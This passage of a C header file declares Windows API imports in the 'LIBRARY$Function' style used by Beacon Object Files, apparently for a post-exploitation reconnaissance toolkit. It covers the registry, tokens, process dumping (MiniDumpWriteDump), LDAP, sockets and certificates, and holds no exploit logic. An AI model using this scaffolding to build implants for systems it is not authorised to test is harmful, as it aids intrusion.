samDesired,PHKEY phkResult); 240 | WINADVAPI LONG WINAPI ADVAPI32$RegConnectRegistryA(LPCSTR lpMachineName,HKEY hKey,PHKEY phkResult); 241 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY hKey); 242 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult); 243 | WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition); 244 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyExA(HKEY hKey,LPCSTR lpSubKey,REGSAM samDesired,DWORD Reserved); 245 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyValueA(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName); 246 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExA(HKEY hKey,LPCSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 247 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey,LPSTR lpClass,LPDWORD lpcchClass,LPDWORD lpReserved,LPDWORD lpcSubKeys,LPDWORD lpcbMaxSubKeyLen,LPDWORD lpcbMaxClassLen,LPDWORD lpcValues,LPDWORD lpcbMaxValueNameLen,LPDWORD lpcbMaxValueLen,LPDWORD lpcbSecurityDescriptor,PFILETIME lpftLastWriteTime); 248 | WINADVAPI LONG WINAPI ADVAPI32$RegEnumValueA(HKEY hKey,DWORD dwIndex,LPSTR lpValueName,LPDWORD lpcchValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 249 | WINADVAPI LONG WINAPI ADVAPI32$RegEnumKeyExA(HKEY hKey,DWORD dwIndex,LPSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime); 250 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteValueA(HKEY hKey,LPCSTR lpValueName); 251 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExW(HKEY hKey,LPCWSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 252 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyExA(HKEY hKey,LPCSTR lpFile,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD Flags); 253 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetFileSecurityW (LPCWSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded); 254 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorOwner (PSECURITY_DESCRIPTOR pSecurityDescriptor, PSID *pOwner, LPBOOL lpbOwnerDefaulted); 255 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, LPBOOL lpbDaclPresent, PACL *pDacl, LPBOOL lpbDaclDefaulted); 256 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetAclInformation (PACL pAcl, LPVOID pAclInformation, DWORD nAclInformationLength, ACL_INFORMATION_CLASS dwAclInformationClass); 257 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetAce (PACL pAcl, DWORD dwAceIndex, LPVOID *pAce); 258 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 259 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidW(PSID Sid,LPWSTR *StringSid); 260 | WINADVAPI VOID WINAPI ADVAPI32$MapGenericMask (PDWORD AccessMask, PGENERIC_MAPPING GenericMapping); 261 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle); 262 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); 263 | WINADVAPI WINBOOL WINAPI ADVAPI32$InitializeSecurityDescriptor (PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision); 264 | WINADVAPI WINBOOL WINAPI ADVAPI32$SetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, WINBOOL bDaclPresent, PACL pDacl, WINBOOL bDaclDefaulted); 265 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW(PSECURITY_DESCRIPTOR SecurityDescriptor,DWORD RequestedStringSDRevision,SECURITY_INFORMATION SecurityInformation,LPWSTR *StringSecurityDescriptor,PULONG StringSecurityDescriptorLen); 266 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService,DWORD dwNumServiceArgs,LPCSTR *lpServiceArgVectors); 267 | WINADVAPI WINBOOL WINAPI ADVAPI32$ControlService(SC_HANDLE hService,DWORD dwControl,LPSERVICE_STATUS lpServiceStatus); 268 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumDependentServicesA(SC_HANDLE hService,DWORD dwServiceState,LPENUM_SERVICE_STATUSA lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned); 269 | WINADVAPI LSTATUS WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey, LPSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcbMaxSubKeyLen, LPDWORD lpcbMaxClassLen, LPDWORD lpcValues, LPDWORD lpcbMaxValueNameLen, LPDWORD lpcbMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime); 270 | 271 | //NTDLL 272 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtCreateFile(PHANDLE FileHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK IoStatusBlock,PLARGE_INTEGER AllocationSize,ULONG FileAttributes,ULONG ShareAccess,ULONG CreateDisposition,ULONG CreateOptions,PVOID EaBuffer,ULONG EaLength); 273 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle); 274 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtFsControlFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,ULONG IoControlCode,PVOID InputBuffer,ULONG InputBufferLength,PVOID OutputBuffer,ULONG OutputBufferLength); 275 | 276 | //IMAGEHLP 277 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageEnumerateCertificates(HANDLE FileHandle,WORD TypeFilter,PDWORD CertificateCount,PDWORD Indices,DWORD IndexCount); 278 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateHeader(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificateheader); 279 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateData(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificate,PDWORD RequiredLength); 280 | 281 | //crypt32 282 | WINIMPM WINBOOL WINAPI CRYPT32$CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert); 283 | WINIMPM DWORD WINAPI CRYPT32$CertGetNameStringW (PCCERT_CONTEXT pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPWSTR pszNameString, DWORD cchNameString); 284 | WINIMPM PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext (DWORD dwCertEncodingType, const BYTE *pbCertEncoded, DWORD cbCertEncoded); 285 | WINIMPM WINBOOL WINAPI CRYPT32$CertFreeCertificateContext (PCCERT_CONTEXT pCertContext); 286 | WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateContextProperty (PCCERT_CONTEXT pCertContext, DWORD dwPropId, void *pvData, DWORD *pcbData); 287 | WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateChain (HCERTCHAINENGINE hChainEngine, PCCERT_CONTEXT pCertContext, LPFILETIME pTime, HCERTSTORE hAdditionalStore, PCERT_CHAIN_PARA pChainPara, DWORD dwFlags, LPVOID pvReserved, PCCERT_CHAIN_CONTEXT *ppChainContext); 288 | WINIMPM VOID WINAPI CRYPT32$CertFreeCertificateChain (PCCERT_CHAIN_CONTEXT pChainContext); 289 | WINIMPM PCCRYPT_OID_INFO WINAPI CRYPT32$CryptFindOIDInfo (DWORD dwKeyType, void *pvKey, DWORD dwGroupId); 290 | 291 | //WS2_32 292 | // defining this here to avoid including ws2tcpip.h which results in include order warnings when bofs include windows.h before bofdefs.h 293 | typedef struct addrinfo { 294 | int ai_flags; 295 | int ai_family; 296 | int ai_socktype; 297 | int ai_protocol; 298 | size_t ai_addrlen; 299 | char *ai_canonname; 300 | struct sockaddr *ai_addr; 301 | struct addrinfo *ai_next; 302 | } ADDRINFOA,*PADDRINFOA; 303 | 304 | //WS2_32 305 | DECLSPEC_IMPORT int __stdcall WS2_32$connect(SOCKET sock, const struct sockaddr* name, int namelen); 306 | DECLSPEC_IMPORT int __stdcall WS2_32$closesocket(SOCKET sock); 307 | DECLSPEC_IMPORT void __stdcall WS2_32$freeaddrinfo(struct addrinfo* ai); 308 | DECLSPEC_IMPORT int __stdcall WS2_32$getaddrinfo(char* host, char* port, const struct addrinfo* hints, struct addrinfo** result); 309 | DECLSPEC_IMPORT u_long __stdcall WS2_32$htonl(u_long hostlong); 310 | DECLSPEC_IMPORT u_short __stdcall WS2_32$htons(u_short hostshort); 311 | DECLSPEC_IMPORT char * __stdcall WS2_32$inet_ntoa(struct in_addr in); 312 | DECLSPEC_IMPORT int __stdcall WS2_32$ioctlsocket(SOCKET sock, long cmd, u_long* arg); 313 | DECLSPEC_IMPORT int __stdcall WS2_32$select(int nfds, fd_set* readfds, fd_set* writefds, fd_set* exceptfds, const struct timeval* timeout); 314 | DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol); 315 | DECLSPEC_IMPORT int __stdcall WS2_32$__WSAFDIsSet(SOCKET sock, struct fd_set* fdset); 316 | DECLSPEC_IMPORT int __stdcall WS2_32$WSAGetLastError(); 317 | DECLSPEC_IMPORT LPCWSTR WINAPI WS2_32$InetNtopW(INT Family, LPCVOID pAddr, LPWSTR pStringBuf, size_t StringBufSIze); 318 | DECLSPEC_IMPORT INT WINAPI WS2_32$inet_pton(INT Family, LPCSTR pStringBuf, PVOID pAddr); 319 | 320 | //dnsapi 321 | DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType); 322 | DECLSPEC_IMPORT int WINAPI DNSAPI$DnsGetCacheDataTable(PVOID data); 323 | 324 | //OLE32 325 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit); 326 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize (void); 327 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity (PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3); 328 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 329 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString (LPCOLESTR lpsz, LPCLSID pclsid); 330 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString (LPCOLESTR lpsz, LPIID lpiid); 331 | DECLSPEC_IMPORT int WINAPI OLE32$StringFromGUID2 (REFGUID rguid, LPOLESTR lpsz, int cchMax); 332 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE pAuthInfo, DWORD dwCapabilities); 333 | DECLSPEC_IMPORT LPVOID WINAPI OLE32$CoTaskMemAlloc(SIZE_T cb); 334 | DECLSPEC_IMPORT void WINAPI OLE32$CoTaskMemFree(LPVOID pv); 335 | 336 | //OLEAUT32 337 | DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 338 | DECLSPEC_IMPORT INT WINAPI OLEAUT32$SysReAllocString(BSTR *, const OLECHAR *); 339 | DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR); 340 | DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SysStringLen(BSTR); 341 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg); 342 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg); 343 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SysAddRefString(BSTR); 344 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantChangeType(VARIANTARG *pvargDest, VARIANTARG *pvarSrc, USHORT wFlags, VARTYPE vt); 345 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VarFormatDateTime(LPVARIANT pvarIn,int iNamedFormat,ULONG dwFlags,BSTR *pbstrOut); 346 | DECLSPEC_IMPORT void WINAPI OLEAUT32$SafeArrayDestroy(SAFEARRAY *psa); 347 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayLock(SAFEARRAY *psa); 348 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetLBound(SAFEARRAY *psa, UINT nDim, LONG *plLbound); 349 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetUBound(SAFEARRAY *psa, UINT nDim, LONG *plUbound); 350 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayGetElement(SAFEARRAY *psa, LONG *rgIndices, void *pv); 351 | DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SafeArrayGetElemsize(SAFEARRAY *psa); 352 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayAccessData(SAFEARRAY *psa,void HUGEP **ppvData); 353 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SafeArrayUnaccessData(SAFEARRAY *psa); 354 | 355 | 356 | 357 | 358 | 359 | 360 | 361 | 362 | //CERTCLI 363 | /* 364 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumFirstCA(IN LPCWSTR wszScope, IN DWORD dwFlags, OUT LPVOID * phCAInfo); 365 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumNextCA(IN LPVOID hPrevCA, OUT LPVOID * phCAInfo); 366 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACloseCA(IN LPVOID hCA); 367 | DECLSPEC_IMPORT DWORD WINAPI CERTCLI$CACountCAs(IN LPVOID hCAInfo); 368 | DECLSPEC_IMPORT LPCWSTR WINAPI CERTCLI$CAGetDN(IN LPVOID hCAInfo); 369 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAProperty(IN LPVOID hCAInfo, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue); 370 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCAProperty(IN LPVOID hCAInfo, IN PZPWSTR awszPropertyValue); 371 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAFlags(IN LPVOID hCAInfo, OUT DWORD *pdwFlags); 372 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCACertificate(IN LPVOID hCAInfo, OUT PCCERT_CONTEXT *ppCert); 373 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCAExpiration(IN LPVOID hCAInfo, OUT DWORD * pdwExpiration, OUT DWORD * pdwUnits); 374 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCASecurity(IN LPVOID hCAInfo, OUT PSECURITY_DESCRIPTOR * ppSD); 375 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetAccessRights(IN LPVOID hCAInfo, IN DWORD dwContext, OUT DWORD *pdwAccessRights); 376 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumCertTypesForCA(IN LPVOID hCAInfo, IN DWORD dwFlags, OUT LPVOID * phCertType); 377 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumCertTypes(IN DWORD dwFlags, OUT LPVOID * phCertType); 378 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAEnumNextCertType(IN LPVOID hPrevCertType, OUT LPVOID * phCertType); 379 | DECLSPEC_IMPORT DWORD WINAPI CERTCLI$CACountCertTypes(IN LPVOID hCertType); 380 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACloseCertType(IN LPVOID hCertType); 381 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeProperty(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT PZPWSTR *pawszPropertyValue); 382 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypePropertyEx(IN LPVOID hCertType, IN LPCWSTR wszPropertyName, OUT LPVOID *pPropertyValue); 383 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCertTypeProperty(IN LPVOID hCertType, IN PZPWSTR awszPropertyValue); 384 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeExtensionsEx(IN LPVOID hCertType, IN DWORD dwFlags, IN LPVOID pParam, OUT PCERT_EXTENSIONS * ppCertExtensions); 385 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAFreeCertTypeExtensions(IN LPVOID hCertType, IN PCERT_EXTENSIONS pCertExtensions); 386 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeFlagsEx(IN LPVOID hCertType, IN DWORD dwOption, OUT DWORD * pdwFlags); 387 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeExpiration(IN LPVOID hCertType, OUT OPTIONAL FILETIME * pftExpiration, OUT OPTIONAL FILETIME * pftOverlap); 388 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CACertTypeGetSecurity(IN LPVOID hCertType, OUT PSECURITY_DESCRIPTOR * ppSD); 389 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$CAGetCertTypeAccessRights(IN LPVOID hCertType, IN DWORD dwContext, OUT DWORD *pdwAccessRights); 390 | DECLSPEC_IMPORT HRESULT WINAPI CERTCLI$caTranslateFileTimePeriodToPeriodUnits(IN FILETIME const *pftGMT, IN BOOL Flags, OUT DWORD *pcPeriodUnits, OUT LPVOID*prgPeriodUnits); 391 | */ 392 | 393 | 394 | 395 | 396 | 397 | 398 | 399 | 400 | 401 | 402 | 403 | //dbghelp 404 | DECLSPEC_IMPORT WINBOOL WINAPI DBGHELP$MiniDumpWriteDump(HANDLE hProcess,DWORD ProcessId,HANDLE hFile,MINIDUMP_TYPE DumpType,CONST PMINIDUMP_EXCEPTION_INFORMATION ExceptionParam,CONST PMINIDUMP_USER_STREAM_INFORMATION UserStreamParam,CONST PMINIDUMP_CALLBACK_INFORMATION CallbackParam); 405 | 406 | //WLDAP32 407 | WINLDAPAPI LDAP* LDAPAPI WLDAP32$ldap_init(PSTR, ULONG); 408 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_bind_s(LDAP *ld,const PSTR dn,const PCHAR cred,ULONG method); 409 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_search_s(LDAP *ld,PSTR base,ULONG scope,PSTR filter,PZPSTR attrs,ULONG attrsonly,PLDAPMessage *res); 410 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_entries(LDAP*,LDAPMessage*); 411 | WINLDAPAPI struct berval **LDAPAPI WLDAP32$ldap_get_values_lenA (LDAP *ExternalHandle,LDAPMessage *Message,const PCHAR attr); 412 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free_len(struct berval **vals); 413 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_set_optionA(LDAP *ld,int option,const void *invalue); 414 | WINLDAPAPI PLDAPSearch LDAPAPI WLDAP32$ldap_search_init_pageA(PLDAP ExternalHandle,const PCHAR DistinguishedName,ULONG ScopeOfSearch,const PCHAR SearchFilter,PCHAR AttributeList[],ULONG AttributesOnly,PLDAPControlA *ServerControls,PLDAPControlA *ClientControls,ULONG PageTimeLimit,ULONG TotalSizeLimit,PLDAPSortKeyA *SortKeys); 415 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_paged_count(PLDAP ExternalHandle,PLDAPSearch SearchBlock,ULONG *TotalCount,PLDAPMessage Results); 416 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_get_next_page_s(PLDAP ExternalHandle,PLDAPSearch SearchHandle,struct l_timeval *timeout,ULONG PageSize,ULONG *TotalCount,LDAPMessage **Results); 417 | 418 | WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_first_entry(LDAP *ld,LDAPMessage *res); 419 | WINLDAPAPI LDAPMessage* LDAPAPI WLDAP32$ldap_next_entry(LDAP*,LDAPMessage*); 420 | WINLDAPAPI PCHAR LDAPAPI WLDAP32$ldap_first_attribute(LDAP *ld,LDAPMessage *entry,BerElement **ptr); 421 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_count_values(PCHAR); 422 | WINLDAPAPI PCHAR * LDAPAPI WLDAP32$ldap_get_values(LDAP *ld,LDAPMessage *entry,const PSTR attr); 423 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_value_free(PCHAR *); 424 | WINLDAPAPI PCHAR LDAPAPI WLDAP32$ldap_next_attribute(LDAP *ld,LDAPMessage *entry,BerElement *ptr); 425 | WINLDAPAPI VOID LDAPAPI WLDAP32$ber_free(BerElement *pBerElement,INT fbuf); 426 | WINLDAPAPI VOID LDAPAPI WLDAP32$ldap_memfree(PCHAR); 427 | 428 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind(LDAP*); 429 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_unbind_s(LDAP*); 430 | WINLDAPAPI ULONG LDAPAPI WLDAP32$ldap_msgfree(LDAPMessage*); 431 | 432 | //RPCRT4 433 | RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$UuidToStringA(UUID *Uuid,RPC_CSTR *StringUuid); 434 | RPCRTAPI RPC_STATUS RPC_ENTRY RPCRT4$RpcStringFreeA(RPC_CSTR *String); 435 | 436 | //PSAPI 437 | DECLSPEC_IMPORT WINBOOL WINAPI PSAPI$EnumProcessModulesEx(HANDLE hProcess, HMODULE *lphModule, DWORD cb, LPDWORD lpcbNeeded, DWORD dwFilterFlag); 438 | DECLSPEC_IMPORT DWORD WINAPI PSAPI$GetModuleFileNameExA(HANDLE hProcess, HMODULE hModule, LPSTR lpFilename, DWORD nSize); 439 | 440 | //VERSION 441 | DECLSPEC_IMPORT DWORD WINAPI VERSION$GetFileVersionInfoSizeA(LPCSTR lptstrFilenamea ,LPDWORD lpdwHandle); 442 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$GetFileVersionInfoA(LPCSTR lptstrFilename, DWORD dwHandle, DWORD dwLen, LPVOID lpData); 443 | DECLSPEC_IMPORT WINBOOL WINAPI VERSION$VerQueryValueA(LPCVOID pBlock, LPCSTR lpSubBlock, LPVOID *lplpBuffer, PUINT puLen); 444 | 445 | 446 | 447 | #else 448 | 449 | 450 | #define intAlloc(size) KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 451 | #define intRealloc(ptr, size) (ptr) ? KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ptr, size) : KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, size) 452 | #define intFree(addr) KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, addr) 453 | #define intZeroMemory(addr,size) MSVCRT$memset((addr),0,size) 454 | 455 | #define KERNEL32$VirtualAlloc VirtualAlloc 456 | #define KERNEL32$VirtualFree VirtualFree 457 | #define KERNEL32$LocalAlloc LocalAlloc 458 | #define KERNEL32$LocalFree LocalFree 459 | #define KERNEL32$HeapAlloc HeapAlloc 460 | #define KERNEL32$HeapReAlloc HeapReAlloc 461 | #define KERNEL32$GetProcessHeap GetProcessHeap 462 | #define KERNEL32$HeapFree HeapFree 463 | #define Kernel32$FormatMessageA FormatMessageA 464 | #define Kernel32$WideCharToMultiByte WideCharToMultiByte 465 | #define KERNEL32$FileTimeToLocalFileTime FileTimeToLocalFileTime 466 | #define KERNEL32$FileTimeToSystemTime FileTimeToSystemTime 467 | #define KERNEL32$GetDateFormatW GetDateFormatW 468 | #define KERNEL32$GetSystemTimeAsFileTime GetSystemTimeAsFileTime 469 | #define KERNEL32$GetLocalTime GetLocalTime 470 | #define KERNEL32$SystemTimeToFileTime SystemTimeToFileTime 471 | #define KERNEL32$SystemTimeToTzSpecificLocalTime SystemTimeToTzSpecificLocalTime 472 | #define KERNEL32$GlobalMemoryStatusEx GlobalMemoryStatusEx 473 | #define KERNEL32$GetDiskFreeSpaceExA GetDiskFreeSpaceExA 474 | #define KERNEL32$GetCurrentProcess GetCurrentProcess 475 | #define KERNEL32$GetCurrentProcessId GetCurrentProcessId 476 | #define KERNEL32$GetLastError GetLastError 477 | #define KERNEL32$CloseHandle CloseHandle 478 | #define KERNEL32$CreateThread CreateThread 479 | #define KERNEL32$GetTickCount GetTickCount 480 | #define KERNEL32$GetTickCount64 GetTickCount64 481 | #define KERNEL32$CreateFiber CreateFiber 482 | #define KERNEL32$ConvertThreadToFiber ConvertThreadToFiber 483 | #define KERNEL32$ConvertFiberToThread ConvertFiberToThread 484 | #define KERNEL32$DeleteFiber DeleteFiber 485 | #define KERNEL32$SwitchToFiber SwitchToFiber 486 | #define KERNEL32$WaitForSingleObject WaitForSingleObject 487 | #define KERNEL32$Sleep Sleep 488 | #define KERNEL32$DeleteFileW DeleteFileW 489 | #define KERNEL32$CreateFileW CreateFileW 490 | #define KERNEL32$GetFileSize GetFileSize 491 | #define KERNEL32$ReadFile ReadFile 492 | #define KERNEL32$OpenProcess OpenProcess 493 | #define KERNEL32$GetComputerNameExW GetComputerNameExW 494 | #define KERNEL32$lstrlenW lstrlenW 495 | #define KERNEL32$lstrcatW lstrcatW 496 | #define KERNEL32$lstrcpynW lstrcpynW 497 | #define KERNEL32$GetFullPathNameW GetFullPathNameW 498 | #define KERNEL32$GetFileAttributesW GetFileAttributesW 499 | #define KERNEL32$GetCurrentDirectoryW GetCurrentDirectoryW 500 | #define KERNEL32$FindFirstFileW FindFirstFileW 501 | #define KERNEL32$FindNextFileW FindNextFileW 502 | #define KERNEL32$FindFirstFileA FindFirstFileA 503 | #define KERNEL32$FindNextFileA FindNextFileA 504 | #define KERNEL32$FindClose FindClose 505 | #define KERNEL32$SetLastError SetLastError 506 | #define KERNEL32$HeapAlloc HeapAlloc 507 | #define KERNEL32$HeapReAlloc HeapReAlloc 508 | #define KERNEL32$HeapFree HeapFree 509 | #define MSVCRT$memset memset 510 | #define KERNEL32$GlobalAlloc GlobalAlloc 511 | #define KERNEL32$GlobalFree GlobalFree 512 | #define KERNEL32$GetEnvironmentStrings GetEnvironmentStrings 513 | #define KERNEL32$FreeEnvironmentStringsA FreeEnvironmentStringsA 514 | #define KERNEL32$ExpandEnvironmentStringsW ExpandEnvironmentStringsW 515 | #define KERNEL32$CreateToolhelp32Snapshot CreateToolhelp32Snapshot 516 | #define KERNEL32$Process32First Process32First 517 | #define KERNEL32$Process32Next Process32Next 518 | #define KERNEL32$Module32First Module32First 519 | #define KERNEL32$Module32Next Module32Next 520 | #define KERNEL32$LoadLibraryA LoadLibraryA 521 | #define KERNEL32$GetProcAddress GetProcAddress 522 | #define KERNEL32$FreeLibrary FreeLibrary 523 | #define KERNEL32$lstrlenA lstrlenA 524 | #define KERNEL32$GetLocaleInfoEx GetLocaleInfoEx 525 | #define KERNEL32$GetSystemDefaultLocaleName GetSystemDefaultLocaleName 526 | #define KERNEL32$LocaleNameToLCID LocaleNameToLCID 527 | #define KERNEL32$GetDateFormatEx GetDateFormatEx 528 | 529 | #define WTSAPI32$WTSEnumerateSessionsA WTSEnumerateSessionsA 530 | #define WTSAPI32$WTSQuerySessionInformationA WTSQuerySessionInformationA 531 | #define WTSAPI32$WTSFreeMemory WTSFreeMemory 532 | #define IPHLPAPI$GetAdaptersInfo GetAdaptersInfo 533 | #define IPHLPAPI$GetAdaptersInfo GetAdaptersInfo 534 | #define IPHLPAPI$GetIpForwardTable GetIpForwardTable 535 | 